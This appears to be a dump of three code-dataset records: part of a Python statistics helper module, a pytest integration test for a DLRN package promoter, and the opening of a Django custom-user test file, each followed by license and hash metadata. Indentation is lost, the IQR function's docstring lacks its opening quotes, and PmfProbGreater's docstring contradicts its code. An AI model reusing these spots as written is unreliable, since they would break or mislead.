self.label = label if label is not None else '_nolegend_'
def __str__(self):
return 'NormalPdf(%f, %f)' % (self.mu, self.sigma)
def GetLinspace(self):
"""Get a linspace for plotting.
Returns: numpy array
"""
low, high = self.mu-3*self.sigma, self.mu+3*self.sigma
return np.linspace(low, high, 101)
def Density(self, xs):
"""Evaluates this Pdf at xs.
xs: scalar or sequence of floats
returns: float or NumPy array of probability density
"""
return stats.norm.pdf(xs, self.mu, self.sigma)
class ExponentialPdf(Pdf):
"""Represents the PDF of an exponential distribution."""
def __init__(self, lam=1, label=None):
"""Constructs an exponential Pdf with given parameter.
lam: rate parameter
label: string
"""
self.lam = lam
self.label = label if label is not None else '_nolegend_'
def __str__(self):
return 'ExponentialPdf(%f)' % (self.lam)
def GetLinspace(self):
"""Get a linspace for plotting.
Returns: numpy array
"""
low, high = 0, 5.0/self.lam
return np.linspace(low, high, 101)
def Density(self, xs):
"""Evaluates this Pdf at xs.
xs: scalar or sequence of floats
returns: float or NumPy array of probability density
"""
return stats.expon.pdf(xs, scale=1.0/self.lam)
class EstimatedPdf(Pdf):
"""Represents a PDF estimated by KDE."""
def __init__(self, sample, label=None):
"""Estimates the density function based on a sample.
sample: sequence of data
label: string
"""
self.label = label if label is not None else '_nolegend_'
self.kde = stats.gaussian_kde(sample)
low = min(sample)
high = max(sample)
self.linspace = np.linspace(low, high, 101)
def __str__(self):
return 'EstimatedPdf(label=%s)' % str(self.label)
def GetLinspace(self):
"""Get a linspace for plotting.
Returns: numpy array
"""
return self.linspace
def Density(self, xs):
"""Evaluates this Pdf at xs.
returns: float or NumPy array of probability density
"""
return self.kde.evaluate(xs)
def Sample(self, n):
"""Generates a random sample from the estimated Pdf.
n: size of sample
"""
# NOTE: we have to flatten because resample returns a 2-D
# array for some reason.
return self.kde.resample(n).flatten()
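# Illustrative sketch (editor's addition, not part of the original module),
# using hypothetical data:
#   sample = np.random.normal(5, 2, 1000)    # hypothetical sample
#   pdf = EstimatedPdf(sample)               # KDE fit to the sample
#   pmf = pdf.MakePmf(label='kde')           # discrete approximation
#   xs, ds = pdf.Render()                    # points suitable for plotting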
def CredibleInterval(pmf, percentage=90):
"""Computes a credible interval for a given distribution.
If percentage=90, computes the 90% CI.
Args:
pmf: Pmf object representing a posterior distribution
percentage: float between 0 and 100
Returns:
sequence of two floats, low and high
"""
cdf = pmf.MakeCdf()
prob = (1 - percentage / 100.0) / 2
interval = cdf.Value(prob), cdf.Value(1 - prob)
return interval
def PmfProbLess(pmf1, pmf2):
"""Probability that a value from pmf1 is less than a value from pmf2.
Args:
pmf1: Pmf object
pmf2: Pmf object
Returns:
float probability
"""
total = 0.0
for v1, p1 in pmf1.Items():
for v2, p2 in pmf2.Items():
if v1 < v2:
total += p1 * p2
return total
def PmfProbGreater(pmf1, pmf2):
"""Probability that a value from pmf1 is less than a value from pmf2.
Args:
pmf1: Pmf object
pmf2: Pmf object
Returns:
float probability
"""
total = 0.0
for v1, p1 in pmf1.Items():
for v2, p2 in pmf2.Items():
if v1 > v2:
total += p1 * p2
return total
def PmfProbEqual(pmf1, pmf2):
"""Probability that a value from pmf1 equals a value from pmf2.
Args:
pmf1: Pmf object
pmf2: Pmf object
Returns:
float probability
"""
total = 0.0
for v1, p1 in pmf1.Items():
for v2, p2 in pmf2.Items():
if v1 == v2:
total += p1 * p2
return total
def RandomSum(dists):
"""Chooses a random value from each dist and returns the sum.
dists: sequence of Pmf or Cdf objects
returns: numerical sum
"""
total = sum(dist.Random() for dist in dists)
return total
def SampleSum(dists, n):
"""Draws a sample of sums from a list of distributions.
dists: sequence of Pmf or Cdf objects
n: sample size
returns: new Pmf of sums
"""
pmf = Pmf(RandomSum(dists) for i in range(n))
return pmf
def EvalNormalPdf(x, mu, sigma):
"""Computes the unnormalized PDF of the normal distribution.
x: value
mu: mean
sigma: standard deviation
returns: float probability density
"""
return stats.norm.pdf(x, mu, sigma)
def MakeNormalPmf(mu, sigma, num_sigmas, n=201):
"""Makes a PMF discrete approx to a Normal distribution.
mu: float mean
sigma: float standard deviation
num_sigmas: how many sigmas to extend in each direction
n: number of values in the Pmf
returns: normalized Pmf
"""
pmf = Pmf()
low = mu - num_sigmas * sigma
high = mu + num_sigmas * sigma
for x in np.linspace(low, high, n):
p = EvalNormalPdf(x, mu, sigma)
pmf.Set(x, p)
pmf.Normalize()
return pmf
def EvalBinomialPmf(k, n, p):
"""Evaluates the binomial PMF.
Returns the probability of k successes in n trials with probability p.
"""
return stats.binom.pmf(k, n, p)
def EvalHypergeomPmf(k, N, K, n):
"""Evaluates the hypergeometric PMF.
Returns the probability of k successes in n trials from a population
N with K successes in it.
"""
return stats.hypergeom.pmf(k, N, K, n)
def EvalPoissonPmf(k, lam):
"""Computes the Poisson PMF.
k: number of events
lam: parameter lambda in events per unit time
returns: float probability
"""
# don't use the scipy function (yet). for lam=0 it returns NaN;
# should be 0.0
# return stats.poisson.pmf(k, lam)
return lam ** k * math.exp(-lam) / special.gamma(k+1)
def MakePoissonPmf(lam, high, step=1):
"""Makes a PMF discrete approx to a Poisson distribution.
lam: parameter lambda in events per unit time
high: upper bound of the Pmf
returns: normalized Pmf
"""
pmf = Pmf()
for k in range(0, high + 1, step):
p = EvalPoissonPmf(k, lam)
pmf.Set(k, p)
pmf.Normalize()
return pmf
def EvalExponentialPdf(x, lam):
"""Computes the exponential PDF.
x: value
lam: parameter lambda in events per unit time
returns: float probability density
"""
return lam * math.exp(-lam * x)
def EvalExponentialCdf(x, lam):
"""Evaluates CDF of the exponential distribution with parameter lam."""
return 1 - math.exp(-lam * x)
def MakeExponentialPmf(lam, high, n=200):
"""Makes a PMF discrete approx to an exponential distribution.
lam: parameter lambda in events per unit time
high: upper bound
n: number of values in the Pmf
returns: normalized Pmf
"""
pmf = Pmf()
for x in np.linspace(0, high, n):
p = EvalExponentialPdf(x, lam)
pmf.Set(x, p)
pmf.Normalize()
return pmf
def StandardNormalCdf(x):
"""Evaluates the CDF of the standard Normal distribution.
See http://en.wikipedia.org/wiki/Normal_distribution
#Cumulative_distribution_function
Args:
x: float
Returns:
float
"""
return (math.erf(x / ROOT2) + 1) / 2
def EvalNormalCdf(x, mu=0, sigma=1):
"""Evaluates the CDF of the normal distribution.
Args:
x: float
mu: mean parameter
sigma: standard deviation parameter
Returns:
float
"""
return stats.norm.cdf(x, loc=mu, scale=sigma)
def EvalNormalCdfInverse(p, mu=0, sigma=1):
"""Evaluates the inverse CDF of the normal distribution.
See http://en.wikipedia.org/wiki/Normal_distribution#Quantile_function
Args:
p: float
mu: mean parameter
sigma: standard deviation parameter
Returns:
float
"""
return stats.norm.ppf(p, loc=mu, scale=sigma)
def EvalLognormalCdf(x, mu=0, sigma=1):
"""Evaluates the CDF of the lognormal distribution.
x: float or sequence
mu: mean parameter
sigma: standard deviation parameter
Returns: float or sequence
"""
return stats.lognorm.cdf(x, loc=mu, scale=sigma)
def RenderExpoCdf(lam, low, high, n=101):
"""Generates sequences of xs and ps for an exponential CDF.
lam: parameter
low: float
high: float
n: number of points to render
returns: numpy arrays (xs, ps)
"""
xs = np.linspace(low, high, n)
ps = 1 - np.exp(-lam * xs)
#ps = stats.expon.cdf(xs, scale=1.0/lam)
return xs, ps
def RenderNormalCdf(mu, sigma, low, high, n=101):
"""Generates sequences of xs and ps for a Normal CDF.
mu: parameter
sigma: parameter
low: float
high: float
n: number of points to render
returns: numpy arrays (xs, ps)
"""
xs = np.linspace(low, high, n)
ps = stats.norm.cdf(xs, mu, sigma)
return xs, ps
def RenderParetoCdf(xmin, alpha, low, high, n=50):
"""Generates sequences of xs and ps for a Pareto CDF.
xmin: parameter
alpha: parameter
low: float
high: float
n: number of points to render
returns: numpy arrays (xs, ps)
"""
if low < xmin:
low = xmin
xs = np.linspace(low, high, n)
ps = 1 - (xs / xmin) ** -alpha
#ps = stats.pareto.cdf(xs, scale=xmin, b=alpha)
return xs, ps
class Beta(object):
"""Represents a Beta distribution.
See http://en.wikipedia.org/wiki/Beta_distribution
"""
def __init__(self, alpha=1, beta=1, label=None):
"""Initializes a Beta distribution."""
self.alpha = alpha
self.beta = beta
self.label = label if label is not None else '_nolegend_'
def Update(self, data):
"""Updates a Beta distribution.
data: pair of int (heads, tails)
"""
heads, tails = data
self.alpha += heads
self.beta += tails
def Mean(self):
"""Computes the mean of this distribution."""
return self.alpha / (self.alpha + self.beta)
def Random(self):
"""Generates a random variate from this distribution."""
return random.betavariate(self.alpha, self.beta)
def Sample(self, n):
"""Generates a random sample from this distribution.
n: int sample size
"""
size = n,
return np.random.beta(self.alpha, self.beta, size)
def EvalPdf(self, x):
"""Evaluates the PDF at x."""
return x ** (self.alpha - 1) * (1 - x) ** (self.beta - 1)
def MakePmf(self, steps=101, label=None):
"""Returns a Pmf of this distribution.
Note: Normally, we just evaluate the PDF at a sequence
of points and treat the probability density as a probability
mass.
But if alpha or beta is less than one, we have to be
more careful because the PDF goes to infinity at x=0
and x=1. In that case we evaluate the CDF and compute
differences.
"""
if self.alpha < 1 or self.beta < 1:
cdf = self.MakeCdf()
pmf = cdf.MakePmf()
return pmf
xs = [i / (steps - 1.0) for i in range(steps)]
probs = [self.EvalPdf(x) for x in xs]
pmf = Pmf(dict(zip(xs, probs)), label=label)
return pmf
def MakeCdf(self, steps=101):
"""Returns the CDF of this distribution."""
xs = [i / (steps - 1.0) for i in range(steps)]
ps = [special.betainc(self.alpha, self.beta, x) for x in xs]
cdf = Cdf(xs, ps)
return cdf
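# Illustrative sketch (editor's addition, not part of the original module).
# Beta supports conjugate updating for a binomial proportion; the data below
# are hypothetical:
#   beta = Beta(1, 1)            # uniform prior
#   beta.Update((140, 110))      # observe 140 heads, 110 tails
#   beta.Mean()                  # posterior mean, about 0.56
#   cdf = beta.MakeCdf()         # for credible intervals, e.g. cdf.Percentile(5)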
class Dirichlet(object):
"""Represents a Dirichlet distribution.
See http://en.wikipedia.org/wiki/Dirichlet_distribution
"""
def __init__(self, n, conc=1, label=None):
"""Initializes a Dirichlet distribution.
n: number of dimensions
conc: concentration parameter (smaller yields more concentration)
label: string label
"""
if n < 2:
raise ValueError('A Dirichlet distribution with '
'n<2 makes no sense')
self.n = n
self.params = np.ones(n, dtype=np.float) * conc
self.label = label if label is not None else '_nolegend_'
def Update(self, data):
"""Updates a Dirichlet distribution.
data: sequence of observations, in order corresponding to params
"""
m = len(data)
self.params[:m] += data
def Random(self):
"""Generates a random variate from this distribution.
Returns: normalized vector of fractions
"""
p = np.random.gamma(self.params)
return p / p.sum()
def Likelihood(self, data):
"""Computes the likelihood of the data.
Selects a random vector of probabilities from this distribution.
Returns: float probability
"""
m = len(data)
if self.n < m:
return 0
x = data
p = self.Random()
q = p[:m] ** x
return q.prod()
def LogLikelihood(self, data):
"""Computes the log likelihood of the data.
Selects a random vector of probabilities from this distribution.
Returns: float log probability
"""
m = len(data)
if self.n < m:
return float('-inf')
x = self.Random()
y = np.log(x[:m]) * data
return y.sum()
def MarginalBeta(self, i):
"""Computes the marginal distribution of the ith element.
See http://en.wikipedia.org/wiki/Dirichlet_distribution
#Marginal_distributions
i: int
Returns: Beta object
"""
alpha0 = self.params.sum()
alpha = self.params[i]
return Beta(alpha, alpha0 - alpha)
def PredictivePmf(self, xs, label=None):
"""Makes a predictive distribution.
xs: values to go into the Pmf
Returns: Pmf that maps from x to the mean prevalence of x
"""
alpha0 = self.params.sum()
ps = self.params / alpha0
return Pmf(zip(xs, ps), label=label)
def BinomialCoef(n, k):
"""Compute the binomial coefficient "n choose k".
n: number of trials
k: number of successes
Returns: float
"""
return scipy.misc.comb(n, k)
def LogBinomialCoef(n, k):
"""Computes the log of the binomial coefficient.
http://math.stackexchange.com/questions/64716/
approximating-the-logarithm-of-the-binomial-coefficient
n: number of trials
k: number of successes
Returns: float
"""
return n * math.log(n) - k * math.log(k) - (n - k) * math.log(n - k)
def NormalProbability(ys, jitter=0.0):
"""Generates data for a normal probability plot.
ys: sequence of values
jitter: float magnitude of jitter added to the ys
returns: numpy arrays xs, ys
"""
n = len(ys)
xs = np.random.normal(0, 1, n)
xs.sort()
if jitter:
ys = Jitter(ys, jitter)
else:
ys = np.array(ys)
ys.sort()
return xs, ys
def Jitter(values, jitter=0.5):
"""Jitters the values by adding a uniform variate in (-jitter, jitter).
values: sequence
jitter: scalar magnitude of jitter
returns: new numpy array
"""
n = len(values)
return np.random.uniform(-jitter, +jitter, n) + values
def NormalProbabilityPlot(sample, fit_color='0.8', **options):
"""Makes a normal probability plot with a fitted line.
sample: sequence of numbers
fit_color: color string for the fitted line
options: passed along to Plot
"""
xs, ys = NormalProbability(sample)
mean, var = MeanVar(sample)
std = math.sqrt(var)
fit = FitLine(xs, mean, std)
thinkplot.Plot(*fit, color=fit_color, label='model')
xs, ys = NormalProbability(sample)
thinkplot.Plot(xs, ys, **options)
def Mean(xs):
"""Computes mean.
xs: sequence of values
returns: float mean
"""
return np.mean(xs)
def Var(xs, mu=None, ddof=0):
"""Computes variance.
xs: sequence of values
mu: optional known mean
ddof: delta degrees of freedom
returns: float
"""
xs = np.asarray(xs)
if mu is None:
mu = xs.mean()
ds = xs - mu
return np.dot(ds, ds) / (len(xs) - ddof)
def Std(xs, mu=None, ddof=0):
"""Computes standard deviation.
xs: sequence of values
mu: optional known mean
ddof: delta degrees of freedom
returns: float
"""
var = Var(xs, mu, ddof)
return math.sqrt(var)
def MeanVar(xs, ddof=0):
"""Computes mean and variance.
Based on http://stackoverflow.com/questions/19391149/
numpy-mean-and-variance-from-single-function
xs: sequence of values
ddof: delta degrees of freedom
returns: pair of float, mean and var
"""
xs = np.asarray(xs)
mean = xs.mean()
s2 = Var(xs, mean, ddof)
return mean, s2
def Trim(t, p=0.01):
"""Trims the largest and smallest elements of t.
Args:
t: sequence of numbers
p: fraction of values to trim off each end
Returns:
sequence of values
"""
n = int(p * len(t))
t = sorted(t)[n:-n]
return t
def TrimmedMean(t, p=0.01):
"""Computes the trimmed mean of a sequence of numbers.
Args:
t: sequence of numbers
p: fraction of values to trim off each end
Returns:
float
"""
t = Trim(t, p)
return Mean(t)
def TrimmedMeanVar(t, p=0.01):
"""Computes the trimmed mean and variance of a sequence of numbers.
Side effect: sorts the list.
Args:
t: sequence of numbers
p: fraction of values to trim off each end
Returns:
float
"""
t = Trim(t, p)
mu, var = MeanVar(t)
return mu, var
def CohenEffectSize(group1, group2):
"""Compute Cohen's d.
group1: Series or NumPy array
group2: Series or NumPy array
returns: float
"""
diff = group1.mean() - group2.mean()
n1, n2 = len(group1), len(group2)
var1 = group1.var()
var2 = group2.var()
pooled_var = (n1 * var1 + n2 * var2) / (n1 + n2)
d = diff / math.sqrt(pooled_var)
return d
def Cov(xs, ys, meanx=None, meany=None):
"""Computes Cov(X, Y).
Args:
xs: sequence of values
ys: sequence of values
meanx: optional float mean of xs
meany: optional float mean of ys
Returns:
Cov(X, Y)
"""
xs = np.asarray(xs)
ys = np.asarray(ys)
if meanx is None:
meanx = np.mean(xs)
if meany is None:
meany = np.mean(ys)
cov = np.dot(xs-meanx, ys-meany) / len(xs)
return cov
def Corr(xs, ys):
"""Computes Corr(X, Y).
Args:
xs: sequence of values
ys: sequence of values
Returns:
Corr(X, Y)
"""
xs = np.asarray(xs)
ys = np.asarray(ys)
meanx, varx = MeanVar(xs)
meany, vary = MeanVar(ys)
corr = Cov(xs, ys, meanx, meany) / math.sqrt(varx * vary)
return corr
def SerialCorr(series, lag=1):
"""Computes the serial correlation of a series.
series: Series
lag: integer number of intervals to shift
returns: float correlation
"""
xs = series[lag:]
ys = series.shift(lag)[lag:]
corr = Corr(xs, ys)
return corr
def SpearmanCorr(xs, ys):
"""Computes Spearman's rank correlation.
Args:
xs: sequence of values
ys: sequence of values
Returns:
float Spearman's correlation
"""
xranks = pandas.Series(xs).rank()
yranks = pandas.Series(ys).rank()
return Corr(xranks, yranks)
def MapToRanks(t):
"""Returns a list of ranks corresponding to the elements in t.
Args:
t: sequence of numbers
Returns:
list of integer ranks, starting at 1
"""
# pair up each value with its index
pairs = enumerate(t)
# sort by value
sorted_pairs = sorted(pairs, key=itemgetter(1))
# pair up each pair with its rank
ranked = enumerate(sorted_pairs)
# sort by index
resorted = sorted(ranked, key=lambda trip: trip[1][0])
# extract the ranks
ranks = [trip[0]+1 for trip in resorted]
return ranks
def LeastSquares(xs, ys):
"""Computes a linear least squares fit for ys as a function of xs.
Args:
xs: sequence of values
ys: sequence of values
Returns:
tuple of (intercept, slope)
"""
meanx, varx = MeanVar(xs)
meany = Mean(ys)
slope = Cov(xs, ys, meanx, meany) / varx
inter = meany - slope * meanx
return inter, slope
def FitLine(xs, inter, slope):
"""Fits a line to the given data.
xs: sequence of x
returns: tuple of numpy arrays (sorted xs, fit ys)
"""
fit_xs = np.sort(xs)
fit_ys = inter + slope * fit_xs
return fit_xs, fit_ys
def Residuals(xs, ys, inter, slope):
"""Computes residuals for a linear fit with parameters inter and slope.
Args:
xs: independent variable
ys: dependent variable
inter: float intercept
slope: float slope
Returns:
list of residuals
"""
xs = np.asarray(xs)
ys = np.asarray(ys)
res = ys - (inter + slope * xs)
return res
def CoefDetermination(ys, res):
"""Computes the coefficient of determination (R^2) for given residuals.
Args:
ys: dependent variable
res: residuals
Returns:
float coefficient of determination
"""
return 1 - Var(res) / Var(ys)
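# Illustrative sketch (editor's addition, not part of the original module),
# tying together LeastSquares, FitLine, Residuals and CoefDetermination on
# hypothetical data:
#   xs = np.linspace(0, 10, 50)
#   ys = 2.0 + 0.5 * xs + np.random.normal(0, 1, 50)
#   inter, slope = LeastSquares(xs, ys)
#   fit_xs, fit_ys = FitLine(xs, inter, slope)
#   r2 = CoefDetermination(ys, Residuals(xs, ys, inter, slope))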
def CorrelatedGenerator(rho):
"""Generates standard normal variates with serial correlation.
rho: target coefficient of correlation
Returns: iterable
"""
x = random.gauss(0, 1)
yield x
sigma = math.sqrt(1 - rho**2)
while True:
x = random.gauss(x * rho, sigma)
yield x
def CorrelatedNormalGenerator(mu, sigma, rho):
"""Generates normal variates with serial correlation.
mu: mean of variate
sigma: standard deviation of variate
rho: target coefficient of correlation
Returns: iterable
"""
for x in CorrelatedGenerator(rho):
yield x * sigma + mu
def RawMoment(xs, k):
"""Computes the kth raw moment of xs.
"""
return sum(x**k for x in xs) / len(xs)
def CentralMoment(xs, k):
"""Computes the kth central moment of xs.
"""
mean = RawMoment(xs, 1)
return sum((x - mean)**k for x in xs) / len(xs)
def StandardizedMoment(xs, k):
"""Computes the kth standardized moment of xs.
"""
var = CentralMoment(xs, 2)
std = math.sqrt(var)
return CentralMoment(xs, k) / std**k
def Skewness(xs):
"""Computes skewness.
"""
return StandardizedMoment(xs, 3)
def Median(xs):
"""Computes the median (50th percentile) of a sequence.
xs: sequence or anything else that can initialize a Cdf
returns: float
"""
cdf = Cdf(xs)
return cdf.Value(0.5)
def IQR(xs):
Computes the interquartile range of a sequence.
xs: sequence or anything else that can initialize a Cdf
returns: pair of floats
"""
cdf = Cdf(xs)
return cdf.Value(0.25), cdf.Value(0.75)
def PearsonMedianSkewness(xs):
"""Computes the Pearson median skewness.
"""
median = Median(xs)
mean = RawMoment(xs, 1)
var = CentralMoment(xs, 2)
std = math.sqrt(var)
gp = 3 * (mean - median) / std
return gp
class FixedWidthVariables(object):
"""Represents a set of variables in a fixed width file."""
def __init__(self, variables, index_base=0):
"""Initializes.
variables: DataFrame
index_base: are the indices 0 or 1 based?
Attributes:
colspecs: list of (start, end) index tuples
names: list of string variable names
"""
self.variables = variables
# note: by default, subtract 1 from colspecs
self.colspecs = variables[['start', 'end']] - index_base
# convert colspecs to a list of pair of int
self.colspecs = self.colspecs.astype(np.int).values.tolist()
self.names = variables['name']
def ReadFixedWidth(self, filename, **options):
"""Reads a fixed width ASCII file.
filename: string filename
returns: DataFrame
"""
df = pandas.read_fwf(filename,
colspecs=self.colspecs,
names=self.names,
**options)
return df
def ReadStataDct(dct_file, **options):
"""Reads a Stata dictionary file.
dct_file: string filename
options: dict of options passed to open()
returns: FixedWidthVariables object
"""
type_map = dict(byte=int, int=int, long=int, float=float, double=float)
var_info = []
for line in open(dct_file, **options):
match = re.search( r'_column\(([^)]*)\)', line)
if match:
start = int(match.group(1))
t = line.split()
vtype, name, fstring = t[1:4]
name = name.lower()
if vtype.startswith('str'):
vtype = str
else:
vtype = type_map[vtype]
long_desc = ' '.join(t[4:]).strip('"')
var_info.append((start, vtype, name, fstring, long_desc))
columns = ['start', 'type', 'name', 'fstring', 'desc']
variables = pandas.DataFrame(var_info, columns=columns)
# fill in the end column by shifting the start column
variables['end'] = variables.start.shift(-1)
variables.loc[len(variables)-1, 'end'] = 0
dct = FixedWidthVariables(variables, index_base=1)
return dct
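# Illustrative sketch (editor's addition, not part of the original module).
# ReadStataDct pairs a Stata dictionary with the fixed-width data file it
# describes; the file names below are hypothetical:
#   dct = ReadStataDct('survey.dct')
#   df = dct.ReadFixedWidth('survey.dat.gz', compression='gzip')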
def Resample(xs, n=None):
"""Draw a sample from xs with the same length as xs.
xs: sequence
n: sample size (default: len(xs))
returns: NumPy array
"""
if n is None:
n = len(xs)
return np.random.choice(xs, n, replace=True)
def SampleRows(df, nrows, replace=False):
"""Choose a sample of rows from a DataFrame.
df: DataFrame
nrows: number of rows
replace: whether to sample with replacement
returns: DataFrame
"""
indices = np.random.choice(df.index, nrows, replace=replace)
sample = df.loc[indices]
return sample
def ResampleRows(df):
"""Resamples rows from a DataFrame.
df: DataFrame
returns: DataFrame
"""
return SampleRows(df, len(df), replace=True)
def ResampleRowsWeighted(df, column='finalwgt'):
"""Resamples a DataFrame using probabilities proportional to given column.
df: DataFrame
column: string column name to use as weights
returns: DataFrame
"""
weights = df[column]
cdf = Cdf(dict(weights))
indices = cdf.Sample(len(weights))
sample = df.loc[indices]
return sample
def PercentileRow(array, p):
"""Selects the row from a sorted array that maps to percentile p.
p: float 0--100
returns: NumPy array (one row)
"""
rows, cols = array.shape
index = int(rows * p / 100)
return array[index,]
def PercentileRows(ys_seq, percents):
"""Given a collection of lines, selects percentiles along vertical axis.
For example, if ys_seq contains simulation results like ys as a
function of time, and percents contains (5, 95), the result would
be a 90% CI for each vertical slice of the simulation results.
ys_seq: sequence of lines (y values)
percents: list of percentiles (0-100) to select
returns: list of NumPy arrays, one for each percentile
"""
nrows = len(ys_seq)
ncols = len(ys_seq[0])
array = np.zeros((nrows, ncols))
for i, ys in enumerate(ys_seq):
array[i,] = ys
array = np.sort(array, axis=0)
rows = [PercentileRow(array, p) for p in percents]
return rows
def Smooth(xs, sigma=2, **options):
"""Smooths a NumPy array with a Gaussian filter.
xs: sequence
sigma: standard deviation of the filter
"""
return ndimage.filters.gaussian_filter1d(xs, sigma, **options)
class HypothesisTest(object):
"""Represents a hypothesis test."""
def __init__(self, data):
"""Initializes.
data: data in whatever form is relevant
"""
self.data = data
self.MakeModel()
self.actual = self.TestStatistic(data)
self.test_stats = None
self.test_cdf = None
def PValue(self, iters=1000):
"""Computes the distribution of the test statistic and p-value.
iters: number of iterations
returns: float p-value
"""
self.test_stats = [self.TestStatistic(self.RunModel())
for _ in range(iters)]
self.test_cdf = Cdf(self.test_stats)
count = sum(1 for x in self.test_stats if x >= self.actual)
return count / iters
def MaxTestStat(self):
"""Returns the largest test statistic seen during simulations.
"""
return max(self.test_stats)
def PlotCdf(self, label=None):
"""Draws a Cdf with vertical lines at the observed test stat.
"""
def VertLine(x):
"""Draws a vertical line at x."""
thinkplot.Plot([x, x], [0, 1], color='0.8')
VertLine(self.actual)
thinkplot.Cdf(self.test_cdf, label=label)
def TestStatistic(self, data):
"""Computes the test statistic.
data: data in whatever form is relevant
"""
raise UnimplementedMethodException()
def MakeModel(self):
"""Build a model of the null hypothesis.
"""
pass
def RunModel(self):
"""Run the model of the null hypothesis.
returns: simulated data
"""
raise UnimplementedMethodException()
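# Illustrative sketch (editor's addition, not part of the original module).
# HypothesisTest is abstract; subclasses provide TestStatistic, MakeModel and
# RunModel. The hypothetical example below is a permutation test for a
# difference in group means.
class _ExampleDiffMeansPermute(HypothesisTest):
    """Permutation test for the difference in means of two groups."""
    def TestStatistic(self, data):
        group1, group2 = data
        return abs(group1.mean() - group2.mean())
    def MakeModel(self):
        group1, group2 = self.data
        self.n = len(group1)
        self.pool = np.hstack((group1, group2))
    def RunModel(self):
        np.random.shuffle(self.pool)
        return self.pool[:self.n], self.pool[self.n:]
# Usage sketch:
#   ht = _ExampleDiffMeansPermute((np.array(xs), np.array(ys)))
#   p_value = ht.PValue(iters=1000)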
def main():
pass
if __name__ == '__main__':
main()
| mit | 1,973,675,057,824,859,000 | 23.589324 | 79 | 0.577964 | false |
redhat-openstack/rdo-infra | ci-scripts/dlrnapi_promoter/test_dlrn_integration.py | 1 | 6534 | """
This test is launched as part of the existing tox command
It tests if promoter and dlrn server are interacting correctly
Uses standard pytest fixture as a setup/teardown method
"""
import logging
import os
import promoter_integration_checks
import pytest
import yaml
from common import close_logging
from config_legacy import PromoterLegacyConfig
try:
import urllib2 as url
except ImportError:
import urllib.request as url
from dlrn_hash import DlrnAggregateHash, DlrnCommitDistroHash, DlrnHash
from dlrnapi_client.rest import ApiException
from logic import Promoter
from stage import main as stage_main
@pytest.fixture(scope='function', params=['dlrn_legacyconf_single',
'dlrn_legacyconf_integration'])
def staged_env(request):
"""
Fixture that runs the staging environment provisioner with parameters,
yields the stage_info file produced, and cleans up afterwards.
It has two parameters by default, to test the interaction for the single
pipeline and for the integration pipeline.
:return: yields the stage_info dict
"""
close_logging("promoter-staging")
close_logging("promoter")
log = logging.getLogger('promoter-staging')
setup_cmd_line = ""
teardown_cmd_line = ""
    # We are going to call the staging main with a composed command line
    # instead of passing configuration directly, so we also test that the
    # argument parsing is working correctly
release_config = \
"CentOS-7/master.yaml"
promoter_config_file = "staging/CentOS-7/master.ini"
setup_cmd_line += " --scenes dlrn"
try:
test_case = request.param
except AttributeError:
pass
except KeyError:
log.error("Invalid test case '{}'".format(request.param))
raise
# for the tests of the integration pipeline we need to pass a different
# file with db data
if "_integration" in test_case:
release_config = \
"CentOS-8/master.yaml"
promoter_config_file = \
"staging/CentOS-8/master.ini"
setup_cmd_line += " --db-data-file integration-pipeline.yaml"
teardown_cmd_line += " --db-data-file integration-pipeline.yaml"
setup_cmd_line += " setup --release-config {}".format(release_config)
teardown_cmd_line += " teardown"
log.info("Running cmd line: {}".format(setup_cmd_line))
config = stage_main(setup_cmd_line)
stage_info_path = config['stage_info_path']
with open(stage_info_path, "r") as stage_info_file:
stage_info = yaml.safe_load(stage_info_file)
overrides = {
'log_file': stage_info['main']['log_file'],
'repo_url': stage_info['dlrn']['server']['repo_url'],
'allowed_clients': 'dlrn_client',
'config_file': promoter_config_file,
}
overrides_obj = type("FakeArgs", (), overrides)
os.environ["DLRNAPI_PASSWORD"] = stage_info['dlrn']['server']['password']
if 'legacyconf' in test_case:
config = PromoterLegacyConfig(overrides_obj.config_file,
overrides=overrides_obj)
else:
raise Exception("New config engine is not implemented yet")
promoter = Promoter(config)
yield stage_info, promoter
log.info("Running cmd line: {}".format(teardown_cmd_line))
stage_main(teardown_cmd_line)
@pytest.mark.serial
def test_dlrn_server(staged_env):
"""
General server testing, with a single promotion
:param staged_env: The staged env fixture
:return: None
"""
stage_info, promoter = staged_env
commit = stage_info['dlrn']['promotions']['promotion_candidate']
candidate_label = commit['name']
promote_name = stage_info['dlrn']['promotion_target']
repo_url = stage_info['dlrn']['server']['repo_url']
client = promoter.dlrn_client
dlrn_hash = DlrnHash(source=commit)
dlrn_hash.label = candidate_label
# TODO: Check db injection (needs sqlite3 import)
# Check we can access dlrnapi
try:
client.promote(dlrn_hash, promote_name,
candidate_label=candidate_label, create_previous=False)
assert True, "Dlrn api responding"
except ApiException as e:
msg = "Exception when calling DefaultApi->api_promote_post: %s\n" % e
assert False, msg
# Check if we can access repo_url and get the versions file
versions_url = os.path.join(repo_url, promote_name, 'versions.csv')
try:
url.urlopen(versions_url)
assert True, "Versions file found"
except IOError:
assert False, "No versions file generated"
@pytest.mark.serial
def test_select_candidates(staged_env):
"""
    Testing the selection of candidate hashes after fetching them from
    the server
:param staged_env: The staged env fixture
:param promoter: The promoter fixture
:return: None
"""
stage_info, promoter = staged_env
candidate_hashes_list = []
for target_label, candidate_label in \
promoter.config.promotion_steps_map.items():
candidate_hashes_list = promoter.select_candidates(candidate_label,
target_label)
assert candidate_hashes_list != []
if stage_info['main']['pipeline_type'] == "integration":
assert type(candidate_hashes_list[0]) == DlrnAggregateHash
elif stage_info['main']['pipeline_type'] == "single":
assert type(candidate_hashes_list[0]) == DlrnCommitDistroHash
def test_promote_all_links(staged_env):
"""
Testing the promotion of candidates inside promote_all_links, but limited
to the dlrn part
:param staged_env: The staged env fixture
:param promoter: The promoter fixture
:return: None
"""
stage_info, promoter = staged_env
promoted_pairs = promoter.promote_all()
for promoted_hash, label in promoted_pairs:
if stage_info['main']['pipeline_type'] == "single":
error_msg = "Single pipeline should promote a commit/distro hash"
assert type(promoted_hash) == DlrnCommitDistroHash, error_msg
elif stage_info['main']['pipeline_type'] == "integration":
error_msg = "Integration pipeline should promote an aggregate hash"
assert type(promoted_hash) == DlrnAggregateHash, error_msg
promoter_integration_checks.check_dlrn_promoted_hash(
stage_info=stage_info)
error_msg = "Nothing promoted, and checks failed to detect issues"
assert len(promoted_pairs) != 0, error_msg
| apache-2.0 | 3,242,506,652,930,499,000 | 33.389474 | 79 | 0.662687 | false |
diego-d5000/MisValesMd | env/lib/python2.7/site-packages/django/contrib/auth/tests/custom_user.py | 1 | 3775 | from django.contrib.auth.models import (
AbstractBaseUser, AbstractUser, BaseUserManager, Group, Permission,
PermissionsMixin, UserManager,
)
from django.db import models
# The custom User uses email as the unique identifier, and requires
